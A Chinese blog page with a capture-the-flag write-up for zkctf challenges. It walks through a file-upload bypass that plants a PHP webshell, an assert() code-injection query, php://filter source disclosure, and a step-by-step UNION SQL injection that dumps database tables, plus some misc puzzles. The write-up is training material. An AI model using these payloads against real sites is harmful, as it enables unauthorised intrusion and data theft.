<!--
	作者：Sariay
	时间：2018-09-25
	描述：There may be a bug, but don't worry, QiLing(器灵) says that it can work normally!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head><meta name="generator" content="Hexo 3.8.0">
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      zkctf部分wp | 美豆的博客
    
  </title>
  <meta name="author" content="刘宸昕">
  <meta name="keywords" content>
  <meta name="description" content="倘若我问心有愧呢？">
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  <link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="/css/Annie.css">
  
  <!-- jquery -->
	<script src="/js/jquery.min.js"></script>

  <!-- leancloud -->
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script src="/js/leancloud.js"></script>
</head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground" data-img-mode="random" data-normal-src="/" data-random-max="110" data-random-src="https://sariay.github.io/Random-img/">
	<div class="mask">
		<!-- Logo and navigation -->
		<div class="h-header">
			<div id="logo">
				<a href="/">
						
						<img src="/img/logo.png" alt="Logo">
					
				</a>
			</div>
			
			<div id="navigation-show">
				<ul>
	
		<li class="menu-home">
			<a href="/" class="menu-item-home">主页</a>
		</li>
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive">归档</a>
		</li>
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories">分类</a>
		</li>
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags">标签</a>
		</li>
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about">关于</a>
		</li>
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery">相册</a>
		</li>
	

	
</ul>
			</div>				
		</div>

		<!-- motto -->
		<div class="h-body">	
			
				<p class="motto"></p>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more"><i class="fa fa-angle-double-down" aria-hidden="true"></i>
			</a>

			
				<!-- 
	This is only a demo, please go to "https://time.is" to set your city time! 
-->
<style type="text/css">
	.header-date {
		font-size: 1.6rem;
		color: #fff;
		position: absolute;
		bottom: 5px;
		right: 1rem;
		writing-mode: tb-rl;
	}	
	
	.header-date a {
		border-bottom: none;
	}

	@media only screen and (max-width: 768 ) {
		.header-date {
			font-size: 1rem;
		}			
	}
</style>
<div class="header-date">
	<a href="https://time.is/Beijing" id="time_is_link" rel="nofollow"></a>
	<span id="Beijing_z43d"></span>
</div>
<script src="//widget.time.is/zh.js"></script>
<script>
	time_is_widget.init({
		Beijing_z43d:{
			template:"DATE", 
			date_format:"year年 monthname dnum日"
		}
	});
</script>
			
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><h1>0.0%</h1></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			当前文章&nbsp;:&nbsp;《zkctf部分wp》
		
	</p>

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<h3>Navigation</h3>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	<div class="nav-body">
		<ul>
	
		<li class="menu-home">
			<a href="/" class="menu-item-home">主页</a>
		</li>
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive">归档</a>
		</li>
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories">分类</a>
		</li>
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags">标签</a>
		</li>
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about">关于</a>
		</li>
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery">相册</a>
		</li>
	

	
</ul>
	</div>
	<div class="nav-footer">
		<ul>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-github"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-weibo"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-pinterest"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-instagram"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-twitter"></i>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<i class="fa fa-rss"></i>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
		<script src="/plugin/toc/katelog.min.js"></script>

		
	 

<div class="layout-post">
	<div id="layout-post">
	<div class="article-title">
		<i class="fa fa-paper-plane-o" aria-hidden="true"></i>
		
	<a href="/2019/05/16/zkctf部分wp/" itemprop="url">
		zkctf部分wp
	</a>

	</div>

	<div class="article-meta">
		<span>
			<i class="fa fa-calendar"></i>
			


	发布于

	<a href="/2019/05/16/zkctf部分wp/" itemprop="url">
		<time datetime="2019-05-16T11:26:44.000Z" itemprop="datePublished">
	  		2019-05-16
	  </time>
	</a>
	&nbsp;





			




	更新于

	<a href="/2019/05/16/zkctf部分wp/" itemprop="url">
		<time datetime="2019-05-16T11:26:44.000Z" itemprop="dateUpdated">
	  		2019-06-05
	  </time>
	</a> 



		</span>
		<span>
			<i class="fa fa-tags"></i>
			
	
		<a href="/tags/zkctf/" class=" ">
			zkctf
		</a>
	
		
		</span>
		
		



	</div>

	<div class="article-content" id="article-content">
		<p>zkctf部分题目的wp<br><a id="more"></a></p>
<h1 id="Web-upload"><a href="#Web-upload" class="headerlink" title="Web upload"></a>Web upload</h1><p>打开题目地址发现是空白<br><img src="https://s2.ax1x.com/2019/05/16/EbtrR0.png" alt="1"><br>查看源代码看到upload.php<br><img src="https://s2.ax1x.com/2019/05/16/EbtcsU.png" alt="2"><br>所以把file改成upload.php，发现是个文件上传，且只能上传jpg格式的文件<br><img src="https://s2.ax1x.com/2019/05/16/EbtszV.png" alt="3"><br>写php一句话木马<br><img src="https://s2.ax1x.com/2019/05/16/EbtRZ4.png" alt="4"><br>上传时用bp抓包<br><img src="https://s2.ax1x.com/2019/05/16/Ebt6MT.png" alt="5"><br>对比上传正常的jpg文件时的请求，把一句话的文件类型改成image/jpeg<br><img src="https://s2.ax1x.com/2019/05/16/EbtgLF.png" alt="6"><br>go一下发现上传成功<br><img src="https://s2.ax1x.com/2019/05/16/Ebtfo9.png" alt="7"><br>接着用菜刀连接<br><img src="https://s2.ax1x.com/2019/05/16/EbtWdJ.png" alt="8"><br>得到flag<br><img src="https://s2.ax1x.com/2019/05/16/Ebt4iR.png" alt="9"></p>
<h1 id="Web-warmup"><a href="#Web-warmup" class="headerlink" title="Web warmup"></a>Web warmup</h1><p>打开题目地址页面上只有一个haha…查看源代码发现一个index.php<br><img src="https://s2.ax1x.com/2019/05/16/EbttsS.png" alt="10"><br>在url中添上index.php得到一段代码<br><img src="https://s2.ax1x.com/2019/05/16/EbtaZQ.png" alt="11"><br>查阅assert函数：检查一个断言是否为 FALSE，如果 传入的值是字符串，它将会被 assert() 当做 PHP 代码来执行。<br>所以可以令a=highlight_file(‘flag.php’);// 高亮显示flag.php，并注释掉后面的代码（==$b都被注释掉了）<br>阅读代码，当b!=Hello World!时程序结束并输出haha…所以先传入b的值：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?b=Hello%20word!&amp;a=highlight_file(%27flag.php%27);//</span><br></pre></td></tr></table></figure></p>
<p>得到flag<br><img src="https://s2.ax1x.com/2019/05/16/EbtYM8.png" alt="12"></p>
<h1 id="Web-where-is-flag"><a href="#Web-where-is-flag" class="headerlink" title="Web where is flag"></a>Web where is flag</h1><p>因为有中英文按钮，发现可以文件上传<br><img src="https://s2.ax1x.com/2019/05/16/EbtwIs.png" alt="13"><br>用php://filter读取index.php,再用base64解码即可得到flag<br><img src="https://s2.ax1x.com/2019/05/16/EbtNqg.png" alt="14"></p>
<h1 id="Web-sql-1"><a href="#Web-sql-1" class="headerlink" title="Web sql-1"></a>Web sql-1</h1><p>判断回显位<br>-1’ union select 1,2,3,4 #</p>
<p>爆数据库<br>-1’ union select database(),2,3,4 #<br>【或：-1’ union select group_concat(schema_name),2,3,4 from information_schema.schemata #】</p>
<p>爆sql1数据库的数据表<br>-1’ union select  group_concat(table_name),2,3,4 from information_schema.tables where table_schema=’sql1’#</p>
<p>爆 fl4g 表的列<br>‘ union select group_concat(column_name),2,3,4 from information_schema.columns where table_name=’fl4g’ #</p>
<p>爆出flag<br>‘ union select *,2,3,4 from fl4g #</p>
<h1 id="Misc-dog"><a href="#Misc-dog" class="headerlink" title="Misc dog"></a>Misc dog</h1><p>下载的压缩包中含有一个flag.jpg和一个打开需要密码的flag.txt，把图片用记事本格式打开查找secret得到打开txt文件需要的密码，打开文件得到flag</p>
<h1 id="Misc-real-pass"><a href="#Misc-real-pass" class="headerlink" title="Misc real pass"></a>Misc real pass</h1><p>打开压缩包发现需要密码，尝试暴力破解但是提示该文件被损坏或是未加密文件<br><img src="https://s2.ax1x.com/2019/05/16/EbtBin.png" alt="16"><br>于是猜想可能是伪加密，用WinHex打开<br><img src="https://s2.ax1x.com/2019/05/16/EbtDGq.png" alt="17"><br>发现源文件数据区加密区为09 00，改成00 00再打开就不需要密码，于是拿到flag。</p>
<h1 id="Misc-hotdog"><a href="#Misc-hotdog" class="headerlink" title="Misc hotdog"></a>Misc hotdog</h1><p>用WinHex打开发现图片中还隐藏了一个flag.zip，将该图片用360压缩打开，得到<br><img src="https://s2.ax1x.com/2019/05/16/Ebtdaj.png" alt="15"><br>打开flag.zip需要密码，密码由颜文字解密得到，解密网站<a href="https://tool.zcmzcm.org/aadecode" target="_blank" rel="noopener">https://tool.zcmzcm.org/aadecode</a><br>输入密码打开flag.txt文件即拿到flag。</p>
<h1 id="Misc-zkzkzk"><a href="#Misc-zkzkzk" class="headerlink" title="Misc zkzkzk"></a>Misc zkzkzk</h1><p>拼图得flag</p>
<h1 id="Misc-格式里的秘密"><a href="#Misc-格式里的秘密" class="headerlink" title="Misc 格式里的秘密"></a>Misc 格式里的秘密</h1><p>图片用记事本打开搜索得到flag</p>
	
	</div>
	
	<div id="current-post-cover" data-scr="/img/post-cover/3.jpg"></div>

	<!-- relate post, comment...-->
	<div class="investment-container">
		<div class="investment-header">
			<div class="investment-title-1">
				<div class="on">相关文章</div>
				<div>评论</div>
				<div>分享</div>
			</div>
			<div class="investment-title-2">	            
				
	<span>
		<a href="javascript: window.scrollTo(0, 0);">返回顶部</a>
		
			<a href="/2019/05/28/zkctf部分wp2/" title="zkctf部分wp2" rel="prev">
				&laquo;上一篇
			</a>
		
		
			<a href="/2019/05/06/zk-web-friend/" title="zkctf friend" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
			</div>	
		</div>
		
		<div class="investment-content">
			<div class="investment-content-list">
				

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/05/28/zkctf部分wp2/" title="zkctf部分wp2">
								zkctf部分wp2			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 28日, 2019				
							</p>
							<p class="relate-post-content">
								  zkctf部分wp2
Web guess game查看源代码，发现其实又是代码审计
1234567891011121314151617181920212223242526272829&lt;!-- error_reporting(...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/05/28/zkctf部分wp2/" title="zkctf部分wp2">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/4.jpg" alt="zkctf部分wp2">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/05/06/zk-web-friend/" title="zkctf friend">
								zkctf friend			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 6日, 2019				
							</p>
							<p class="relate-post-content">
								涉及知识点：序列化、反序列化unserialize()、魔术方法__tostring又是一道代码审计的题，源码index.php：1234567891011121314151617181920212223242526272829303...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/05/06/zk-web-friend/" title="zkctf friend">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/5.jpg" alt="zkctf friend">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/05/06/zk-web-代码审计/" title="zkctf 代码审计">
								zkctf 代码审计			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 6日, 2019				
							</p>
							<p class="relate-post-content">
								涉及知识点：ereg函数存在00截断的漏洞zkctf一道代码审计的题，代码如下：1234567891011121314151617181920212223242526272829303132&lt;?php include(&quot...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/05/06/zk-web-代码审计/" title="zkctf 代码审计">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/6.jpg" alt="zkctf 代码审计">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/09/26/一篇反省/" title="一篇反省">
								一篇反省			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 26日, 2019				
							</p>
							<p class="relate-post-content">
								&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;每天一篇博客不能断更，那我今天就不写技术文章了，今天想反思一下自己。&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;实验室的比赛从昨天到今...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/09/26/一篇反省/" title="一篇反省">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/13.jpg" alt="一篇反省">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/09/26/攻防世界crypto新手wp（2）/" title="攻防世界crypto新手wp（2）">
								攻防世界crypto新手wp（2）			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 26日, 2019				
							</p>
							<p class="relate-post-content">
								记一下前天写的一道密码题
Normal_RSA
你和小鱼走啊走走啊走，走到下一个题目一看你又一愣，怎么还是一个数学题啊 小鱼又一笑，hhhh数学在密码学里面很重要的！现在知道吃亏了吧！你哼一声不服气，我知道数学 很重要了！但是工具也很...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/09/26/攻防世界crypto新手wp（2）/" title="攻防世界crypto新手wp（2）">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/16.jpg" alt="攻防世界crypto新手wp（2）">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/09/24/攻防世界crypto新手wp（1）/" title="攻防世界crypto新手wp（1）">
								攻防世界crypto新手wp（1）			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 24日, 2019				
							</p>
							<p class="relate-post-content">
								转轮机加密
你俩继续往前走，来到了前面的下一个关卡，这个铺面墙上写了好多奇奇怪怪的 英文字母，排列的的整整齐齐，店面前面还有一个大大的类似于土耳其旋转烤肉的架子，上面一圈圈的 也刻着很多英文字母，你是一个小历史迷，对于二战时候的历史刚...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/09/24/攻防世界crypto新手wp（1）/" title="攻防世界crypto新手wp（1）">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/16.jpg" alt="攻防世界crypto新手wp（1）">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/09/23/攻防世界crypto新手wp/" title="攻防世界crypto新手wp">
								攻防世界crypto新手wp			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 23日, 2019				
							</p>
							<p class="relate-post-content">
								base64
元宵节灯谜是一种古老的传统民间观灯猜谜的习俗。 因为谜语能启迪智慧又饶有兴趣，灯谜增添节日气氛，是一项很有趣的活动。 你也很喜欢这个游戏，这不，今年元宵节，心里有个黑客梦的你，约上你青梅竹马的好伙伴小鱼， 来到了cybe...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/09/23/攻防世界crypto新手wp/" title="攻防世界crypto新手wp">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/15.jpg" alt="攻防世界crypto新手wp">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/09/22/xss练习题/" title="xss练习题">
								xss练习题			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 22日, 2019				
							</p>
							<p class="relate-post-content">
								https://xss.haozi.me/#/0x04 习题答案解析：
0x00题目：123function render (input) &#123;  return &apos;&lt;div&gt;&apos; + input ...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/09/22/xss练习题/" title="xss练习题">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/14.jpg" alt="xss练习题">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/08/01/攻防世界web新手wp（四）/" title="攻防世界web新手wp（四）">
								攻防世界web新手wp（四）			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								八月 1日, 2019				
							</p>
							<p class="relate-post-content">
								攻防世界web新手题8、12题一个星期前的三道web新手题一直拖着没写wp…今天补出来。昨天一人跟我说我博客半年没更新了，我气急败坏的怼回去说我顶多一周没更新，结果打开博客一看，从24号到31号刚好一周…七月份放假后可以说过的相当放松...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/08/01/攻防世界web新手wp（四）/" title="攻防世界web新手wp（四）">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/13.jpg" alt="攻防世界web新手wp（四）">
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/07/24/攻防世界misc新手wp（一）/" title="攻防世界misc新手wp（一）">
								攻防世界misc新手wp（一）			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								七月 24日, 2019				
							</p>
							<p class="relate-post-content">
								攻防世界misc新手题4-6题
pdf根据题目描述可知，flag可能会隐藏在图片下面。将图片移开的方法：

用pdf编辑工具使图片缩小可以看到图片后面的flag
利用在线工具：https://app.xunjiepdf.com/pdf...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/07/24/攻防世界misc新手wp（一）/" title="攻防世界misc新手wp（一）">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/post-cover/11.jpg" alt="攻防世界misc新手wp（一）">
							</a>
						</div>
					</li>											
			
			
		</ul>
	
</div>	
			</div>
			<div class="investment-content-list">
				<div class="layout-comment">

	

		

			<!-- I don't know !!!-->
			<div>Please check the comment setting in config.yml of hexo-theme-Annie!</div>
			
		
		
	

</div>
			</div>
			<div class="investment-content-list">
				<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


			</div>
		</div>	
	</div>
	</div>
</div>



	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


	


<!-- show math formula -->



	 
	<script src="/plugin/clipboard/clipboard.js"></script>
	<script>
		// Copy code !
	    function codePreprocessing() {
	        $("#article-content .highlight").each(function() {

	            $(this).wrap('<div id="post-code"></div>');

	        })

	        $("#article-content #post-code").each(function() {

	            $(this).prepend('<nav class="copy-nav"><span><i class="code-language"></i></span></nav>');

	        })

	        $("#article-content .copy-nav").each(function() {
	            var temp = $(this).next().attr('class'),
	                language = ((temp.length > 9) && (temp != null)) ? temp.substr(10) : "none"; //why 9? Need to check language?

	            $(this).find('.code-language').text(language);

	            $(this).append('<span class="copy-btn"><i class="fa fa-copy" aria-hidden="true"></i></span>');

	        });
	    }

		function codeCopy() {
		    $('#article-content #post-code').each(function(i) {
		        var codeCopyId = 'codeCopy-' + i;

		        var codeNode = $(this).find('.code'),
		            copyButton = $(this).find('.copy-btn');

		        codeNode.attr('id', codeCopyId);
		        copyButton.attr('data-clipboard-target-id', codeCopyId);
		    })

		    
			var clipboard = new ClipboardJS('.copy-btn', {
					target: function(trigger) {
						return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
					}
		      	});

			//pure js
			function showTooltip(elem, msg) {		   
				elem.setAttribute('aria-label', msg);
				elem.setAttribute('class', 'copy-btn copy-status');
				setTimeout(function() {
					elem.setAttribute('class', 'copy-btn');
				}, 2000);
			}

			clipboard.on('success', function(e) {
			    e.clearSelection();
			    console.info('Action:', e.action);		   
			    console.info('Trigger:', e.trigger);
			    showTooltip(e.trigger, 'Copied!');
			    
			});
			clipboard.on('error', function(e) {
			    console.error('Action:', e.action);
			    console.error('Trigger:', e.trigger);
			});
		

		}

		if ($('.layout-post').length) {
		    codePreprocessing();
		    codeCopy();
		} 
	</script>





<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
<script src="/plugin/fancybox/jquery.fancybox.js"></script>

<script type="text/javascript">
	var titleID = $('.article-title a'),
		imageID = $('.article-content img'),
		videoID = $('.article-content video');

	var postTitle = titleID.text() ? titleID.text() : "No post title!";

	imageID.each(function() {
		var imgPath = $(this).attr('src'),
			imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";

		//给每个匹配的<img>元素打包, 即添加父元素<a>
		$(this).wrap('<a data-fancybox="gallery" data-caption=" 《 ' + postTitle + ' 》 ' + imgTitle + ' "  href=" ' + imgPath + ' "> </a>');
	});

	videoID.each(function() {
		var videoPath = $(this).attr('src');

		//给每个匹配的<img>元素打包, 即添加父元素<a>
		$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
	});
	//TODO：支持html5 video

	if($('#layout-post').length) {
		$('[data-fancybox="gallery"]').fancybox({
			loop: true,
			buttons: [
				"zoom",
				"share",
				"slideShow",
				"fullScreen",
				//"download",
				"thumbs",
				"close"
			],
			protect: false
		});
	}
</script>
		</main>

		<!--footer-->
		<footer>
	<div class="social">
		<ul>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-github"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-weibo"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-pinterest"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-instagram"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-twitter"></i>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<i class="fa fa-rss"></i>
			</a>
		</li>
			
</ul>

	</div>
		
	<div class="copyright">
		<p>
			 
				&copy;2017 - 2019, content by 刘宸昕. All Rights Reserved.
			
			
			

	<!-- busuanzi -->
	<!-- busuanzi -->

		
	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	

		<span id="busuanzi_container_page_pv">
	  		本文总阅读量<span id="busuanzi_value_page_pv"></span>次
		</span>

	




		</p>
		<p>
			<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- set '1' to show motto in all pages! -->

	<script src="/plugin/motto/motto.js"></script>
	
	<script type="text/javascript">
		$(".motto").html( getMingYanContent() );
	</script>	





<!-- love effect -->

	<script src="/plugin/love/love.js"></script>


<!-- back to top -->

	
	<div id="totop">
  		<a href="javascript:;" name="TOTOP" class="fa fa-arrow-up"></a>
	</div>




<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<script src="/plugin/vibrant/vibrant.js"></script>
<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imgLazyLoader/yall.min.js"></script>
<script src="/plugin/imgResize/jquery.resizeimagetoparent.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/js/resizediv.js"></script>
<script src="/js/main.js"></script>
	</body>	
</html>